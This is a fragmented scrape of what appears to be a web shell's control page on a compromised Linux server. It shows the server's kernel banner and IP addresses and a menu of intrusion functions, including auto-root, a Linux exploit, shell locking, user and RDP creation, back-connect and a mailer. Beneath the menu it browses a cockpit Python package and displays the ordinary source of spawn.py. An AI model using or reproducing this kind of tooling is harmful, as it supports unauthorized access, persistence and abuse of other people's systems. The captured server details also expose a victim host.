Linux salto.nuvemidc.com 5.14.0-687.42.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Aug 27 11:55:12 EDT 2026 x86_64
LiteSpeed
: 177.73.233.61 | : 216.73.217.116
Cant Read [ /etc/named.conf ]
7.4.33
agenci18
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
lib /
python3.9 /
site-packages /
cockpit /
_vendor /
bei /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
data
[ DIR ]
drwxr-xr-x
__init__.py
0
B
-rw-r--r--
beiboot.py
5.04
KB
-rw-r--r--
beipack.py
7.2
KB
-rw-r--r--
bootloader.py
3.48
KB
-rw-r--r--
spawn.py
971
B
-rw-r--r--
tmpfs.py
563
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : spawn.py
"""Helper to create a beipack to spawn a command with files in a tmpdir""" import argparse import os import sys from . import pack, tmpfs def main() -> None: parser = argparse.ArgumentParser() parser.add_argument('--file', '-f', action='append') parser.add_argument('command', nargs='+', help='The command to execute') args = parser.parse_args() contents = { '_beitmpfs.py': tmpfs.__spec__.loader.get_data(tmpfs.__spec__.origin) } if args.file is not None: files = args.file else: file = args.command[-1] files = [file] args.command[-1] = './' + os.path.basename(file) for filename in files: with open(filename, 'rb') as file: basename = os.path.basename(filename) contents[f'tmpfs/{basename}'] = file.read() script = pack.pack(contents, '_beitmpfs:main', '*' + repr(args.command)) sys.stdout.write(script) if __name__ == '__main__': main()
Close